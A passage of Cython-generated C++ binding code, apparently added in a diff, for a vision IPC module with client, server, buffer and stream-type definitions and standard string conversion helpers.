__pyx_mstate_global->__pyx_n_s_Pyx_EnumMeta___reduce_cython +#define __pyx_n_s_Pyx_EnumMeta___setstate_cython __pyx_mstate_global->__pyx_n_s_Pyx_EnumMeta___setstate_cython +#define __pyx_n_s_Pyx_FlagBase __pyx_mstate_global->__pyx_n_s_Pyx_FlagBase +#define __pyx_n_s_Pyx_FlagBase___new __pyx_mstate_global->__pyx_n_s_Pyx_FlagBase___new +#define __pyx_n_s_Pyx_FlagBase___repr __pyx_mstate_global->__pyx_n_s_Pyx_FlagBase___repr +#define __pyx_n_s_Pyx_FlagBase___str __pyx_mstate_global->__pyx_n_s_Pyx_FlagBase___str +#define __pyx_n_s_Sequence __pyx_mstate_global->__pyx_n_s_Sequence +#define __pyx_kp_s_Step_may_not_be_zero_axis_d __pyx_mstate_global->__pyx_kp_s_Step_may_not_be_zero_axis_d +#define __pyx_kp_b_T __pyx_mstate_global->__pyx_kp_b_T +#define __pyx_n_s_TypeError __pyx_mstate_global->__pyx_n_s_TypeError +#define __pyx_kp_s_Unable_to_convert_item_to_object __pyx_mstate_global->__pyx_kp_s_Unable_to_convert_item_to_object +#define __pyx_kp_s_Unknown_enum_value_s __pyx_mstate_global->__pyx_kp_s_Unknown_enum_value_s +#define __pyx_n_s_VISION_STREAM_DRIVER __pyx_mstate_global->__pyx_n_s_VISION_STREAM_DRIVER +#define __pyx_n_s_VISION_STREAM_MAP __pyx_mstate_global->__pyx_n_s_VISION_STREAM_MAP +#define __pyx_n_s_VISION_STREAM_ROAD __pyx_mstate_global->__pyx_n_s_VISION_STREAM_ROAD +#define __pyx_n_s_VISION_STREAM_WIDE_ROAD __pyx_mstate_global->__pyx_n_s_VISION_STREAM_WIDE_ROAD +#define __pyx_n_s_ValueError __pyx_mstate_global->__pyx_n_s_ValueError +#define __pyx_n_s_View_MemoryView __pyx_mstate_global->__pyx_n_s_View_MemoryView +#define __pyx_n_s_VisionBuf __pyx_mstate_global->__pyx_n_s_VisionBuf +#define __pyx_n_s_VisionBuf___reduce_cython __pyx_mstate_global->__pyx_n_s_VisionBuf___reduce_cython +#define __pyx_n_s_VisionBuf___setstate_cython __pyx_mstate_global->__pyx_n_s_VisionBuf___setstate_cython +#define __pyx_n_s_VisionIpcClient __pyx_mstate_global->__pyx_n_s_VisionIpcClient +#define __pyx_n_s_VisionIpcClient___reduce_cython __pyx_mstate_global->__pyx_n_s_VisionIpcClient___reduce_cython +#define __pyx_n_s_VisionIpcClient___setstate_cytho __pyx_mstate_global->__pyx_n_s_VisionIpcClient___setstate_cytho +#define __pyx_n_s_VisionIpcClient_available_stream __pyx_mstate_global->__pyx_n_s_VisionIpcClient_available_stream +#define __pyx_n_s_VisionIpcClient_connect __pyx_mstate_global->__pyx_n_s_VisionIpcClient_connect +#define __pyx_n_s_VisionIpcClient_is_connected __pyx_mstate_global->__pyx_n_s_VisionIpcClient_is_connected +#define __pyx_n_s_VisionIpcClient_recv __pyx_mstate_global->__pyx_n_s_VisionIpcClient_recv +#define __pyx_n_s_VisionIpcServer __pyx_mstate_global->__pyx_n_s_VisionIpcServer +#define __pyx_n_s_VisionIpcServer___reduce_cython __pyx_mstate_global->__pyx_n_s_VisionIpcServer___reduce_cython +#define __pyx_n_s_VisionIpcServer___setstate_cytho __pyx_mstate_global->__pyx_n_s_VisionIpcServer___setstate_cytho +#define __pyx_n_s_VisionIpcServer_create_buffers __pyx_mstate_global->__pyx_n_s_VisionIpcServer_create_buffers +#define __pyx_n_s_VisionIpcServer_create_buffers_w __pyx_mstate_global->__pyx_n_s_VisionIpcServer_create_buffers_w +#define __pyx_n_s_VisionIpcServer_send __pyx_mstate_global->__pyx_n_s_VisionIpcServer_send +#define __pyx_n_s_VisionIpcServer_start_listener __pyx_mstate_global->__pyx_n_s_VisionIpcServer_start_listener +#define __pyx_n_s_VisionStreamType __pyx_mstate_global->__pyx_n_s_VisionStreamType +#define __pyx_kp_b__11 __pyx_mstate_global->__pyx_kp_b__11 +#define __pyx_kp_b__12 __pyx_mstate_global->__pyx_kp_b__12 +#define __pyx_kp_b__13 __pyx_mstate_global->__pyx_kp_b__13 +#define __pyx_kp_u__14 __pyx_mstate_global->__pyx_kp_u__14 +#define __pyx_kp_u__15 __pyx_mstate_global->__pyx_kp_u__15 +#define __pyx_kp_u__3 __pyx_mstate_global->__pyx_kp_u__3 +#define __pyx_kp_u__4 __pyx_mstate_global->__pyx_kp_u__4 +#define __pyx_n_s__5 __pyx_mstate_global->__pyx_n_s__5 +#define __pyx_n_s__68 __pyx_mstate_global->__pyx_n_s__68 +#define __pyx_kp_u__8 __pyx_mstate_global->__pyx_kp_u__8 +#define __pyx_kp_u__9 __pyx_mstate_global->__pyx_kp_u__9 +#define __pyx_n_s_abc __pyx_mstate_global->__pyx_n_s_abc +#define __pyx_n_s_allocate_buffer __pyx_mstate_global->__pyx_n_s_allocate_buffer +#define __pyx_kp_u_and __pyx_mstate_global->__pyx_kp_u_and +#define __pyx_n_s_asarray __pyx_mstate_global->__pyx_n_s_asarray +#define __pyx_n_s_asyncio_coroutines __pyx_mstate_global->__pyx_n_s_asyncio_coroutines +#define __pyx_n_s_available_streams __pyx_mstate_global->__pyx_n_s_available_streams +#define __pyx_n_s_base __pyx_mstate_global->__pyx_n_s_base +#define __pyx_n_s_block __pyx_mstate_global->__pyx_n_s_block +#define __pyx_n_s_blocking __pyx_mstate_global->__pyx_n_s_blocking +#define __pyx_n_s_buf __pyx_mstate_global->__pyx_n_s_buf +#define __pyx_n_s_c __pyx_mstate_global->__pyx_n_s_c +#define __pyx_n_u_c __pyx_mstate_global->__pyx_n_u_c +#define __pyx_kp_s_cereal_visionipc_visionipc_pyx __pyx_mstate_global->__pyx_kp_s_cereal_visionipc_visionipc_pyx +#define __pyx_kp_s_cereal_visionipc_visionipc_pyx_p __pyx_mstate_global->__pyx_kp_s_cereal_visionipc_visionipc_pyx_p +#define __pyx_n_s_class __pyx_mstate_global->__pyx_n_s_class +#define __pyx_n_s_class_getitem __pyx_mstate_global->__pyx_n_s_class_getitem +#define __pyx_n_s_cline_in_traceback __pyx_mstate_global->__pyx_n_s_cline_in_traceback +#define __pyx_n_s_cls __pyx_mstate_global->__pyx_n_s_cls +#define __pyx_n_s_collections __pyx_mstate_global->__pyx_n_s_collections +#define __pyx_kp_s_collections_abc __pyx_mstate_global->__pyx_kp_s_collections_abc +#define __pyx_n_s_conflate __pyx_mstate_global->__pyx_n_s_conflate +#define __pyx_n_s_connect __pyx_mstate_global->__pyx_n_s_connect +#define __pyx_kp_s_contiguous_and_direct __pyx_mstate_global->__pyx_kp_s_contiguous_and_direct +#define __pyx_kp_s_contiguous_and_indirect __pyx_mstate_global->__pyx_kp_s_contiguous_and_indirect +#define __pyx_n_s_count __pyx_mstate_global->__pyx_n_s_count +#define __pyx_n_s_create_buffers __pyx_mstate_global->__pyx_n_s_create_buffers +#define __pyx_n_s_create_buffers_with_sizes __pyx_mstate_global->__pyx_n_s_create_buffers_with_sizes +#define __pyx_n_s_data __pyx_mstate_global->__pyx_n_s_data +#define __pyx_n_s_dct __pyx_mstate_global->__pyx_n_s_dct +#define __pyx_n_s_dict __pyx_mstate_global->__pyx_n_s_dict +#define __pyx_n_s_dict_2 __pyx_mstate_global->__pyx_n_s_dict_2 +#define __pyx_kp_u_disable __pyx_mstate_global->__pyx_kp_u_disable +#define __pyx_n_s_doc __pyx_mstate_global->__pyx_n_s_doc +#define __pyx_n_s_dtype_is_object __pyx_mstate_global->__pyx_n_s_dtype_is_object +#define __pyx_kp_u_enable __pyx_mstate_global->__pyx_kp_u_enable +#define __pyx_n_s_encode __pyx_mstate_global->__pyx_n_s_encode +#define __pyx_n_s_enum __pyx_mstate_global->__pyx_n_s_enum +#define __pyx_n_s_enumerate __pyx_mstate_global->__pyx_n_s_enumerate +#define __pyx_n_s_error __pyx_mstate_global->__pyx_n_s_error +#define __pyx_n_s_extra __pyx_mstate_global->__pyx_n_s_extra +#define __pyx_n_s_flags __pyx_mstate_global->__pyx_n_s_flags +#define __pyx_n_s_format __pyx_mstate_global->__pyx_n_s_format +#define __pyx_n_s_fortran __pyx_mstate_global->__pyx_n_s_fortran +#define __pyx_n_u_fortran __pyx_mstate_global->__pyx_n_u_fortran +#define __pyx_n_s_frame_id __pyx_mstate_global->__pyx_n_s_frame_id +#define __pyx_kp_u_gc __pyx_mstate_global->__pyx_kp_u_gc +#define __pyx_n_s_get __pyx_mstate_global->__pyx_n_s_get +#define __pyx_n_s_get_endpoint_name __pyx_mstate_global->__pyx_n_s_get_endpoint_name +#define __pyx_n_s_getstate __pyx_mstate_global->__pyx_n_s_getstate +#define __pyx_kp_u_got __pyx_mstate_global->__pyx_kp_u_got +#define __pyx_kp_u_got_differing_extents_in_dimensi __pyx_mstate_global->__pyx_kp_u_got_differing_extents_in_dimensi +#define __pyx_n_s_height __pyx_mstate_global->__pyx_n_s_height +#define __pyx_n_s_id __pyx_mstate_global->__pyx_n_s_id +#define __pyx_n_s_import __pyx_mstate_global->__pyx_n_s_import +#define __pyx_n_s_index __pyx_mstate_global->__pyx_n_s_index +#define __pyx_n_s_init __pyx_mstate_global->__pyx_n_s_init +#define __pyx_n_s_init_subclass __pyx_mstate_global->__pyx_n_s_init_subclass +#define __pyx_n_s_initializing __pyx_mstate_global->__pyx_n_s_initializing +#define __pyx_n_s_is_connected __pyx_mstate_global->__pyx_n_s_is_connected +#define __pyx_n_s_is_coroutine __pyx_mstate_global->__pyx_n_s_is_coroutine +#define __pyx_kp_u_isenabled __pyx_mstate_global->__pyx_kp_u_isenabled +#define __pyx_n_s_itemsize __pyx_mstate_global->__pyx_n_s_itemsize +#define __pyx_kp_s_itemsize_0_for_cython_array __pyx_mstate_global->__pyx_kp_s_itemsize_0_for_cython_array +#define __pyx_n_s_join __pyx_mstate_global->__pyx_n_s_join +#define __pyx_n_s_main __pyx_mstate_global->__pyx_n_s_main +#define __pyx_n_s_member_names __pyx_mstate_global->__pyx_n_s_member_names +#define __pyx_n_s_members __pyx_mstate_global->__pyx_n_s_members +#define __pyx_n_s_memview __pyx_mstate_global->__pyx_n_s_memview +#define __pyx_n_s_metaclass __pyx_mstate_global->__pyx_n_s_metaclass +#define __pyx_n_s_mode __pyx_mstate_global->__pyx_n_s_mode +#define __pyx_n_s_module __pyx_mstate_global->__pyx_n_s_module +#define __pyx_n_s_module_2 __pyx_mstate_global->__pyx_n_s_module_2 +#define __pyx_n_s_mro_entries __pyx_mstate_global->__pyx_n_s_mro_entries +#define __pyx_n_s_name __pyx_mstate_global->__pyx_n_s_name +#define __pyx_n_s_name_2 __pyx_mstate_global->__pyx_n_s_name_2 +#define __pyx_n_s_ndim __pyx_mstate_global->__pyx_n_s_ndim +#define __pyx_n_s_new __pyx_mstate_global->__pyx_n_s_new +#define __pyx_kp_s_no_default___reduce___due_to_non __pyx_mstate_global->__pyx_kp_s_no_default___reduce___due_to_non +#define __pyx_n_s_np __pyx_mstate_global->__pyx_n_s_np +#define __pyx_n_s_num_buffers __pyx_mstate_global->__pyx_n_s_num_buffers +#define __pyx_n_s_numpy __pyx_mstate_global->__pyx_n_s_numpy +#define __pyx_kp_u_numpy_core_multiarray_failed_to __pyx_mstate_global->__pyx_kp_u_numpy_core_multiarray_failed_to +#define __pyx_kp_u_numpy_core_umath_failed_to_impor __pyx_mstate_global->__pyx_kp_u_numpy_core_umath_failed_to_impor +#define __pyx_n_s_obj __pyx_mstate_global->__pyx_n_s_obj +#define __pyx_n_s_pack __pyx_mstate_global->__pyx_n_s_pack +#define __pyx_n_s_parents __pyx_mstate_global->__pyx_n_s_parents +#define __pyx_n_s_pickle __pyx_mstate_global->__pyx_n_s_pickle +#define __pyx_n_s_prepare __pyx_mstate_global->__pyx_n_s_prepare +#define __pyx_n_s_pyx_PickleError __pyx_mstate_global->__pyx_n_s_pyx_PickleError +#define __pyx_n_s_pyx_checksum __pyx_mstate_global->__pyx_n_s_pyx_checksum +#define __pyx_n_s_pyx_result __pyx_mstate_global->__pyx_n_s_pyx_result +#define __pyx_n_s_pyx_state __pyx_mstate_global->__pyx_n_s_pyx_state +#define __pyx_n_s_pyx_type __pyx_mstate_global->__pyx_n_s_pyx_type +#define __pyx_n_s_pyx_unpickle_Enum __pyx_mstate_global->__pyx_n_s_pyx_unpickle_Enum +#define __pyx_n_s_pyx_unpickle___Pyx_EnumMeta __pyx_mstate_global->__pyx_n_s_pyx_unpickle___Pyx_EnumMeta +#define __pyx_n_s_pyx_vtable __pyx_mstate_global->__pyx_n_s_pyx_vtable +#define __pyx_n_s_qualname __pyx_mstate_global->__pyx_n_s_qualname +#define __pyx_n_s_range __pyx_mstate_global->__pyx_n_s_range +#define __pyx_n_s_recv __pyx_mstate_global->__pyx_n_s_recv +#define __pyx_n_s_reduce __pyx_mstate_global->__pyx_n_s_reduce +#define __pyx_n_s_reduce_cython __pyx_mstate_global->__pyx_n_s_reduce_cython +#define __pyx_n_s_reduce_ex __pyx_mstate_global->__pyx_n_s_reduce_ex +#define __pyx_n_s_register __pyx_mstate_global->__pyx_n_s_register +#define __pyx_n_s_repr __pyx_mstate_global->__pyx_n_s_repr +#define __pyx_n_s_res __pyx_mstate_global->__pyx_n_s_res +#define __pyx_n_s_rgb __pyx_mstate_global->__pyx_n_s_rgb +#define __pyx_kp_s_s_s __pyx_mstate_global->__pyx_kp_s_s_s +#define __pyx_kp_s_s_s_d __pyx_mstate_global->__pyx_kp_s_s_s_d +#define __pyx_n_s_self __pyx_mstate_global->__pyx_n_s_self +#define __pyx_kp_s_self_buf_cannot_be_converted_to __pyx_mstate_global->__pyx_kp_s_self_buf_cannot_be_converted_to +#define __pyx_kp_s_self_server_cannot_be_converted __pyx_mstate_global->__pyx_kp_s_self_server_cannot_be_converted +#define __pyx_n_s_send __pyx_mstate_global->__pyx_n_s_send +#define __pyx_n_s_set_name __pyx_mstate_global->__pyx_n_s_set_name +#define __pyx_n_s_setstate __pyx_mstate_global->__pyx_n_s_setstate +#define __pyx_n_s_setstate_cython __pyx_mstate_global->__pyx_n_s_setstate_cython +#define __pyx_n_s_shape __pyx_mstate_global->__pyx_n_s_shape +#define __pyx_n_s_size __pyx_mstate_global->__pyx_n_s_size +#define __pyx_n_s_spec __pyx_mstate_global->__pyx_n_s_spec +#define __pyx_n_s_start __pyx_mstate_global->__pyx_n_s_start +#define __pyx_n_s_start_listener __pyx_mstate_global->__pyx_n_s_start_listener +#define __pyx_n_s_state __pyx_mstate_global->__pyx_n_s_state +#define __pyx_n_s_staticmethod __pyx_mstate_global->__pyx_n_s_staticmethod +#define __pyx_n_s_step __pyx_mstate_global->__pyx_n_s_step +#define __pyx_n_s_stop __pyx_mstate_global->__pyx_n_s_stop +#define __pyx_n_s_str __pyx_mstate_global->__pyx_n_s_str +#define __pyx_n_s_stream __pyx_mstate_global->__pyx_n_s_stream +#define __pyx_n_s_stride __pyx_mstate_global->__pyx_n_s_stride +#define __pyx_kp_s_strided_and_direct __pyx_mstate_global->__pyx_kp_s_strided_and_direct +#define __pyx_kp_s_strided_and_direct_or_indirect __pyx_mstate_global->__pyx_kp_s_strided_and_direct_or_indirect +#define __pyx_kp_s_strided_and_indirect __pyx_mstate_global->__pyx_kp_s_strided_and_indirect +#define __pyx_kp_s_stringsource __pyx_mstate_global->__pyx_kp_s_stringsource +#define __pyx_n_s_struct __pyx_mstate_global->__pyx_n_s_struct +#define __pyx_n_s_super __pyx_mstate_global->__pyx_n_s_super +#define __pyx_n_s_sys __pyx_mstate_global->__pyx_n_s_sys +#define __pyx_n_s_test __pyx_mstate_global->__pyx_n_s_test +#define __pyx_n_s_timeout_ms __pyx_mstate_global->__pyx_n_s_timeout_ms +#define __pyx_n_s_timestamp_eof __pyx_mstate_global->__pyx_n_s_timestamp_eof +#define __pyx_n_s_timestamp_sof __pyx_mstate_global->__pyx_n_s_timestamp_sof +#define __pyx_n_s_tp __pyx_mstate_global->__pyx_n_s_tp +#define __pyx_kp_s_unable_to_allocate_array_data __pyx_mstate_global->__pyx_kp_s_unable_to_allocate_array_data +#define __pyx_kp_s_unable_to_allocate_shape_and_str __pyx_mstate_global->__pyx_kp_s_unable_to_allocate_shape_and_str +#define __pyx_n_s_unpack __pyx_mstate_global->__pyx_n_s_unpack +#define __pyx_n_s_update __pyx_mstate_global->__pyx_n_s_update +#define __pyx_n_s_use_setstate __pyx_mstate_global->__pyx_n_s_use_setstate +#define __pyx_n_s_uv_offset __pyx_mstate_global->__pyx_n_s_uv_offset +#define __pyx_n_s_v __pyx_mstate_global->__pyx_n_s_v +#define __pyx_n_s_value __pyx_mstate_global->__pyx_n_s_value +#define __pyx_n_s_values __pyx_mstate_global->__pyx_n_s_values +#define __pyx_n_s_version_info __pyx_mstate_global->__pyx_n_s_version_info +#define __pyx_n_s_width __pyx_mstate_global->__pyx_n_s_width +#define __pyx_int_0 __pyx_mstate_global->__pyx_int_0 +#define __pyx_int_1 __pyx_mstate_global->__pyx_int_1 +#define __pyx_int_3 __pyx_mstate_global->__pyx_int_3 +#define __pyx_int_100 __pyx_mstate_global->__pyx_int_100 +#define __pyx_int_112105877 __pyx_mstate_global->__pyx_int_112105877 +#define __pyx_int_136983863 __pyx_mstate_global->__pyx_int_136983863 +#define __pyx_int_184977713 __pyx_mstate_global->__pyx_int_184977713 +#define __pyx_int_222419149 __pyx_mstate_global->__pyx_int_222419149 +#define __pyx_int_228825662 __pyx_mstate_global->__pyx_int_228825662 +#define __pyx_int_238750788 __pyx_mstate_global->__pyx_int_238750788 +#define __pyx_int_neg_1 __pyx_mstate_global->__pyx_int_neg_1 +#define __pyx_slice__7 __pyx_mstate_global->__pyx_slice__7 +#define __pyx_tuple__2 __pyx_mstate_global->__pyx_tuple__2 +#define __pyx_tuple__6 __pyx_mstate_global->__pyx_tuple__6 +#define __pyx_tuple__10 __pyx_mstate_global->__pyx_tuple__10 +#define __pyx_tuple__16 __pyx_mstate_global->__pyx_tuple__16 +#define __pyx_tuple__17 __pyx_mstate_global->__pyx_tuple__17 +#define __pyx_tuple__18 __pyx_mstate_global->__pyx_tuple__18 +#define __pyx_tuple__20 __pyx_mstate_global->__pyx_tuple__20 +#define __pyx_tuple__22 __pyx_mstate_global->__pyx_tuple__22 +#define __pyx_tuple__24 __pyx_mstate_global->__pyx_tuple__24 +#define __pyx_tuple__25 __pyx_mstate_global->__pyx_tuple__25 +#define __pyx_tuple__29 __pyx_mstate_global->__pyx_tuple__29 +#define __pyx_tuple__32 __pyx_mstate_global->__pyx_tuple__32 +#define __pyx_tuple__34 __pyx_mstate_global->__pyx_tuple__34 +#define __pyx_tuple__35 __pyx_mstate_global->__pyx_tuple__35 +#define __pyx_tuple__36 __pyx_mstate_global->__pyx_tuple__36 +#define __pyx_tuple__37 __pyx_mstate_global->__pyx_tuple__37 +#define __pyx_tuple__38 __pyx_mstate_global->__pyx_tuple__38 +#define __pyx_tuple__39 __pyx_mstate_global->__pyx_tuple__39 +#define __pyx_tuple__40 __pyx_mstate_global->__pyx_tuple__40 +#define __pyx_tuple__41 __pyx_mstate_global->__pyx_tuple__41 +#define __pyx_tuple__42 __pyx_mstate_global->__pyx_tuple__42 +#define __pyx_tuple__44 __pyx_mstate_global->__pyx_tuple__44 +#define __pyx_tuple__48 __pyx_mstate_global->__pyx_tuple__48 +#define __pyx_tuple__50 __pyx_mstate_global->__pyx_tuple__50 +#define __pyx_tuple__52 __pyx_mstate_global->__pyx_tuple__52 +#define __pyx_tuple__54 __pyx_mstate_global->__pyx_tuple__54 +#define __pyx_tuple__58 __pyx_mstate_global->__pyx_tuple__58 +#define __pyx_tuple__60 __pyx_mstate_global->__pyx_tuple__60 +#define __pyx_tuple__61 __pyx_mstate_global->__pyx_tuple__61 +#define __pyx_tuple__64 __pyx_mstate_global->__pyx_tuple__64 +#define __pyx_codeobj__19 __pyx_mstate_global->__pyx_codeobj__19 +#define __pyx_codeobj__21 __pyx_mstate_global->__pyx_codeobj__21 +#define __pyx_codeobj__23 __pyx_mstate_global->__pyx_codeobj__23 +#define __pyx_codeobj__26 __pyx_mstate_global->__pyx_codeobj__26 +#define __pyx_codeobj__27 __pyx_mstate_global->__pyx_codeobj__27 +#define __pyx_codeobj__28 __pyx_mstate_global->__pyx_codeobj__28 +#define __pyx_codeobj__30 __pyx_mstate_global->__pyx_codeobj__30 +#define __pyx_codeobj__31 __pyx_mstate_global->__pyx_codeobj__31 +#define __pyx_codeobj__33 __pyx_mstate_global->__pyx_codeobj__33 +#define __pyx_codeobj__43 __pyx_mstate_global->__pyx_codeobj__43 +#define __pyx_codeobj__45 __pyx_mstate_global->__pyx_codeobj__45 +#define __pyx_codeobj__46 __pyx_mstate_global->__pyx_codeobj__46 +#define __pyx_codeobj__47 __pyx_mstate_global->__pyx_codeobj__47 +#define __pyx_codeobj__49 __pyx_mstate_global->__pyx_codeobj__49 +#define __pyx_codeobj__51 __pyx_mstate_global->__pyx_codeobj__51 +#define __pyx_codeobj__53 __pyx_mstate_global->__pyx_codeobj__53 +#define __pyx_codeobj__55 __pyx_mstate_global->__pyx_codeobj__55 +#define __pyx_codeobj__56 __pyx_mstate_global->__pyx_codeobj__56 +#define __pyx_codeobj__57 __pyx_mstate_global->__pyx_codeobj__57 +#define __pyx_codeobj__59 __pyx_mstate_global->__pyx_codeobj__59 +#define __pyx_codeobj__62 __pyx_mstate_global->__pyx_codeobj__62 +#define __pyx_codeobj__63 __pyx_mstate_global->__pyx_codeobj__63 +#define __pyx_codeobj__65 __pyx_mstate_global->__pyx_codeobj__65 +#define __pyx_codeobj__66 __pyx_mstate_global->__pyx_codeobj__66 +#define __pyx_codeobj__67 __pyx_mstate_global->__pyx_codeobj__67 +/* #### Code section: module_code ### */ + +/* "string.from_py":13 + * + * @cname("__pyx_convert_string_from_py_std__in_string") + * cdef string __pyx_convert_string_from_py_std__in_string(object o) except *: # <<<<<<<<<<<<<< + * cdef Py_ssize_t length = 0 + * cdef const char* data = __Pyx_PyObject_AsStringAndSize(o, &length) + */ + +static std::string __pyx_convert_string_from_py_std__in_string(PyObject *__pyx_v_o) { + Py_ssize_t __pyx_v_length; + char const *__pyx_v_data; + std::string __pyx_r; + __Pyx_RefNannyDeclarations + char const *__pyx_t_1; + std::string __pyx_t_2; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__pyx_convert_string_from_py_std__in_string", 0); + + /* "string.from_py":14 + * @cname("__pyx_convert_string_from_py_std__in_string") + * cdef string __pyx_convert_string_from_py_std__in_string(object o) except *: + * cdef Py_ssize_t length = 0 # <<<<<<<<<<<<<< + * cdef const char* data = __Pyx_PyObject_AsStringAndSize(o, &length) + * return string(data, length) + */ + __pyx_v_length = 0; + + /* "string.from_py":15 + * cdef string __pyx_convert_string_from_py_std__in_string(object o) except *: + * cdef Py_ssize_t length = 0 + * cdef const char* data = __Pyx_PyObject_AsStringAndSize(o, &length) # <<<<<<<<<<<<<< + * return string(data, length) + * + */ + __pyx_t_1 = __Pyx_PyObject_AsStringAndSize(__pyx_v_o, (&__pyx_v_length)); if (unlikely(__pyx_t_1 == ((char const *)NULL))) __PYX_ERR(1, 15, __pyx_L1_error) + __pyx_v_data = __pyx_t_1; + + /* "string.from_py":16 + * cdef Py_ssize_t length = 0 + * cdef const char* data = __Pyx_PyObject_AsStringAndSize(o, &length) + * return string(data, length) # <<<<<<<<<<<<<< + * + * + */ + try { + __pyx_t_2 = std::string(__pyx_v_data, __pyx_v_length); + } catch(...) { + __Pyx_CppExn2PyErr(); + __PYX_ERR(1, 16, __pyx_L1_error) + } + __pyx_r = __pyx_t_2; + goto __pyx_L0; + + /* "string.from_py":13 + * + * @cname("__pyx_convert_string_from_py_std__in_string") + * cdef string __pyx_convert_string_from_py_std__in_string(object o) except *: # <<<<<<<<<<<<<< + * cdef Py_ssize_t length = 0 + * cdef const char* data = __Pyx_PyObject_AsStringAndSize(o, &length) + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("string.from_py.__pyx_convert_string_from_py_std__in_string", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_pretend_to_initialize(&__pyx_r); + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "string.to_py":31 + * + * @cname("__pyx_convert_PyObject_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyObject_string_to_py_std__in_string(const string& s): # <<<<<<<<<<<<<< + * return __Pyx_PyObject_FromStringAndSize(s.data(), s.size()) + * cdef extern from *: + */ + +static CYTHON_INLINE PyObject *__pyx_convert_PyObject_string_to_py_std__in_string(std::string const &__pyx_v_s) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__pyx_convert_PyObject_string_to_py_std__in_string", 0); + + /* "string.to_py":32 + * @cname("__pyx_convert_PyObject_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyObject_string_to_py_std__in_string(const string& s): + * return __Pyx_PyObject_FromStringAndSize(s.data(), s.size()) # <<<<<<<<<<<<<< + * cdef extern from *: + * cdef object __Pyx_PyUnicode_FromStringAndSize(const char*, size_t) + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyObject_FromStringAndSize(__pyx_v_s.data(), __pyx_v_s.size()); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 32, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "string.to_py":31 + * + * @cname("__pyx_convert_PyObject_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyObject_string_to_py_std__in_string(const string& s): # <<<<<<<<<<<<<< + * return __Pyx_PyObject_FromStringAndSize(s.data(), s.size()) + * cdef extern from *: + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("string.to_py.__pyx_convert_PyObject_string_to_py_std__in_string", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "string.to_py":37 + * + * @cname("__pyx_convert_PyUnicode_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyUnicode_string_to_py_std__in_string(const string& s): # <<<<<<<<<<<<<< + * return __Pyx_PyUnicode_FromStringAndSize(s.data(), s.size()) + * cdef extern from *: + */ + +static CYTHON_INLINE PyObject *__pyx_convert_PyUnicode_string_to_py_std__in_string(std::string const &__pyx_v_s) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__pyx_convert_PyUnicode_string_to_py_std__in_string", 0); + + /* "string.to_py":38 + * @cname("__pyx_convert_PyUnicode_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyUnicode_string_to_py_std__in_string(const string& s): + * return __Pyx_PyUnicode_FromStringAndSize(s.data(), s.size()) # <<<<<<<<<<<<<< + * cdef extern from *: + * cdef object __Pyx_PyStr_FromStringAndSize(const char*, size_t) + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyUnicode_FromStringAndSize(__pyx_v_s.data(), __pyx_v_s.size()); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 38, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "string.to_py":37 + * + * @cname("__pyx_convert_PyUnicode_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyUnicode_string_to_py_std__in_string(const string& s): # <<<<<<<<<<<<<< + * return __Pyx_PyUnicode_FromStringAndSize(s.data(), s.size()) + * cdef extern from *: + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("string.to_py.__pyx_convert_PyUnicode_string_to_py_std__in_string", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "string.to_py":43 + * + * @cname("__pyx_convert_PyStr_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyStr_string_to_py_std__in_string(const string& s): # <<<<<<<<<<<<<< + * return __Pyx_PyStr_FromStringAndSize(s.data(), s.size()) + * cdef extern from *: + */ + +static CYTHON_INLINE PyObject *__pyx_convert_PyStr_string_to_py_std__in_string(std::string const &__pyx_v_s) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__pyx_convert_PyStr_string_to_py_std__in_string", 0); + + /* "string.to_py":44 + * @cname("__pyx_convert_PyStr_string_to_py_std__in_string") + * cdef inline object __pyx_convert_PyStr_string_to_py_std__in_string(const string& s): + * return __Pyx_PyStr_FromStringAndSize(s.data(), s.size()) # <<<<<<<<<<<<<< + * cdef extern from *: + * cdef object __Pyx_PyBytes_FromStringAndSize(const char*, size_t) + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyStr_FromStringAndSize(__pyx_v_s.data(), __pyx_v_s.size()); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 44, __pyx_L1_error) + 